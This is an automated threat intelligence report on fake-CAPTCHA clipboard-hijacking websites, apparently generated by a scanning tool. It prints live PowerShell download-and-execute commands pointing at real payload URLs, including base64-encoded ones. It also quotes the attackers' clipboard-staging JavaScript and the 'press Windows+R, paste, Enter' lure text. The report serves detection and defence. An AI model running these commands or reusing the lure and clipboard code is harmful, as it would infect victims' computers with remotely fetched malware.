Threat Intelligence Report

Date: September 22, 2025 | Generated: 2025-09-22 02:23:40 | Sites Analyzed: 15

  • Total Sites Analyzed: 15
  • Malicious Sites: 4 (27.0% detection rate)
  • PowerShell Commands: 8
  • Clipboard Hijacks: 15
  • Avg Threat Score: 84

Attack Pattern Analysis

  • High Risk Commands: 6
  • Base64 Encoded: 4
  • Obfuscated JS: 1
  • Inline JS Redirects: 8
  • External JS Chains: 0
  • Redirect Follows: 0

Detection counters:

  • PowerShellCommands: 8
  • EncodedPowerShell: 0
  • ClipboardManipulation: 12
  • ObfuscatedJavaScript: 1
  • Base64Strings: 4
  • JavaScriptRedirects: 8
  • JavaScriptRedirectChains: 0
  • RedirectFollows: 0
  • CaptchaElements: 15

Top Indicators/Keywords

  • CAPTCHA Verification (3)
  • I am not a robot (3)
  • Robot (3)
  • robot (3)
  • Verification (3)
  • verification-id (3)
  • verification_id (3)
  • hidden (3)
  • verification (2)
  • To better prove you are not a robot (2)

Malicious Sites Detected

powershell: 3 | clipboard: 5 | captcha: 7 | base64: 3 | high risk commands: 3

💻 PowerShell Commands 3

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing)
iwr

🔍 Suspicious Keywords 13

CAPTCHA Verification
Verification ID
I am not a robot
robot
Robot
Verification
verification
verification-id
verification_id
Verify You Are Human

🌐 Extracted URLs 2

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 4 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
...k", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "0"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function 
setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = commandToRun setClipboardCopyData(textToCopy); } function showVerifyWindow() {...

powershell: 3 | clipboard: 5 | downloads: 1 | captcha: 4 | high risk commands: 2

💻 PowerShell Commands 3

powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\"";
powershell " + htaPath;
iwr

🔍 Suspicious Keywords 13

CAPTCHA Verification
Verification Hash
I am not a robot
Robot
robot
Verification
verification
verification-id
verification_id
To better prove you are not a robot

🌐 Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1

📋 Clipboard Manipulation Code

Showing first 2 of 4 entries (truncated for performance)

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextA...
...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function 
setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()...

powershell: 2 | obfuscation: 1 | base64: 1 | high risk commands: 1

💻 PowerShell Commands 2

documentElement.innerHTML
powershell -win mini -enc YwB1AHIAbAAuAGUAeABlACAAaAB0AHQAcAA6AC8ALwAxADcAMQAuADIAMgAuADEANgAuADEAMwA0AC8AYgBvAG8AawB2AGkAdABhAC4AdAB4AHQAIAB8ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuAA==");

🔐 Obfuscated JavaScript

Showing first 1 of 1 entries (truncated for performance)

Script (excerpt): if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini|Mobile|Tablet/i.test(navigator.userAgent) || window.innerWidth < 768) { window.s...

Indicators:

  • Pattern: var\s+_0x[a-f0-9]{4,6}\s*= (count: 3; examples: var _0x2BA3=, var _0x8820=)
  • Pattern: _0x[a-f0-9]{4,6}\[.*?\] (count: 1; example: _0x2BA3[_idx])
  • Pattern: var\s+_0x[a-f0-9]{2,8}\s*= (count: 3; examples: var _0x2BA3=, var _0x8820=)

Score: 7
Position: 100

clipboard: 5 | captcha: 4

🔍 Suspicious Keywords 10

CAPTCHA Verification
Verification ID
I am not a robot
Robot
robot
Verification
verification-id
verification_id
hidden
mshta

🌐 Extracted URLs 4

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/

📋 Clipboard Manipulation Code

Showing first 2 of 4 entries (truncated for performance)

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextA...
...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function 
setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()...

Technical Analysis

ClickGrab Threat Analysis Report - 2025-09-22

Generated on 2025-09-22 02:23:41

Executive Summary

  • Total sites analyzed: 15
  • Sites with malicious content: 4
  • Unique domains encountered: 7
  • Total URLs extracted: 34
  • PowerShell download attempts: 1
  • Clipboard manipulation instances: 12

Domain Analysis

Most Frequently Encountered Domains

  • www.webgo.de: 10 occurrences
  • godprox.cc: 8 occurrences
  • www.google.com: 7 occurrences
  • t.me: 4 occurrences
  • use.fontawesome.com: 3 occurrences
  • irp.cdn-website.com: 1 occurrence
  • www.1c-bitrix.ru: 1 occurrence

URL Pattern Analysis

reCAPTCHA imagery

3 occurrences across 1 distinct URL

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (3 times)

Font resources

3 occurrences across 1 distinct URL

  • https://use.fontawesome.com/releases/v5.0.0/css/all.css (3 times)

CDN hosted scripts

1 occurrence across 1 distinct URL

  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 time)

Google resources

7 occurrences across 3 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (3 times)
  • https://www.google.com/intl/en/policies/privacy/ (2 times)
  • https://www.google.com/intl/en/policies/terms/ (2 times)

Suspicious Keyword Analysis

Total Keywords Found: 36 (16 unique)

Keyword Categories

Social Engineering

12 unique keywords

  • Verification
  • I am not a robot
  • Verification ID
  • verification
  • Robot
  • verification-id
  • Verify You Are Human
  • verification_id
  • CAPTCHA Verification
  • To better prove you are not a robot
  • ...and 2 more

Verification Text

2 unique keywords

  • Hidden
  • hidden

Technical Terms

2 unique keywords

  • mshta
  • iex

Most Frequent Keywords

  • CAPTCHA Verification: 3 occurrences
  • I am not a robot: 3 occurrences
  • Robot: 3 occurrences
  • robot: 3 occurrences
  • Verification: 3 occurrences
  • verification-id: 3 occurrences
  • verification_id: 3 occurrences
  • hidden: 3 occurrences
  • verification: 2 occurrences
  • To better prove you are not a robot: 2 occurrences
  • iex: 2 occurrences
  • Verification ID: 2 occurrences
  • Verification Hash: 1 occurrence
  • Hidden: 1 occurrence
  • Verify You Are Human: 1 occurrence

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: CAPTCHA Verification, Verification, verification

Group 2: Verification Hash, verification-id, verification_id, Verification ID

Group 3: Robot, robot

Group 4: Hidden, hidden

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

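These strings consist only of Base64-alphabet characters and may contain encoded malicious payloads. The one listed here is a fragment of the reCAPTCHA logo URL extracted above, not an encoded payload: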

  • com/recaptcha/about/images/reCAPTCHA

Clipboard Manipulation Analysis

Detected clipboard manipulation in 12 instances.

document.execCommand Copy

Found in 9 snippets (75.0% of clipboard code)

Examples:

document.execCommand("copy")

Textarea Manipulation

Found in 9 snippets (75.0% of clipboard code)

Examples:

ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy) {
    const tempTextArea = document.createElement("textarea");
    tempTextArea.value = textToCopy;
    document.body.append(tempTextArea);
    tempTextArea.select();
    document.execCommand("copy");
    document.body.removeChild(tempTextArea);
}

Clipboard Attack Flow Analysis

Attack Sophistication: 6/7 components detected
Total Technique Instances: 40

Attack Flow Components

The following components show how the clipboard attack is executed:

Element Creation

Creating temporary DOM elements

Instances: 3 Examples: createElement("textarea"

Content Injection

Injecting malicious content into elements

Instances: 4 Examples: .value =, .textContent =

DOM Manipulation

Adding elements to the DOM

Instances: 9 Examples: body.append, append(

Selection Methods

Selecting content for copying

Instances: 9 Examples: .select()

Clipboard Operations

Executing clipboard copy operations

Instances: 9 Examples: execCommand("copy"

Cleanup Operations

Removing temporary elements

Instances: 6 Examples: removeChild

Malicious Payload Construction

How the final clipboard payload is assembled:

Command Concatenation

Instances: 2 Examples: - commandToRun +

Verification Text

Instances: 1 Examples:

Complete these Verification Steps

To better prove you are not a robot, please:

  1. Press & hold the Windows Key + R.
  2. In the verification window, press Ctrl + V.
  3. Press Enter on your keyboard to finish.

You will observe and agree:
✠"I am not a robot - reCAPTCHA Verification Hash: 1110"


I'm not a robot

...

Verify You Are Human

Please verify that you are a human to continue.

Complete these Verification Steps

To better prove you are not a robot, please:

  1. Press & hold the Windows Key + R.
  2. In the verification window, press Ctrl + V.
  3. Press Enter on your keyboard to finish.

You will observe and agree:
✠"I am not a robot - reCAPTCHA Verification ID: 146820"

Perform the steps above to finish verification.

Verify You Are Human

I'm not a robot

...

Chinese-language variant of the lure, in translation:

Complete these Verification Steps

To better prove you are not a robot, please:

  1. Press and hold the Windows key + R.
  2. In the verification window, press Ctrl + V.
  3. Press the Enter key on your keyboard to finish.

You will comply and agree:
✠"I am not a robot - reCAPTCHA Verification ID: 146820"

Hash Generation

Instances: 1 Examples: - verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); }

Comment Injection

Instances: 3 Examples: - # " const ploy = "

Attack Pattern Reconstruction

Malicious Download Sources

  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1

Key Findings

  1. Prevalence: 26.7% of analyzed sites contained malicious content
  2. Primary Attack Vector: Fake CAPTCHA verification leading to clipboard hijacking
  3. Target Platform: Windows systems via PowerShell execution
  4. Social Engineering: Sophisticated UI mimicking legitimate Google reCAPTCHA

Recommendations

  1. User Education: Warn users about fake CAPTCHA verification schemes
  2. Clipboard Monitoring: Implement clipboard monitoring for suspicious PowerShell commands
  3. URL Filtering: Block known malicious domains identified in this analysis
  4. PowerShell Execution Policy: Restrict PowerShell execution in corporate environments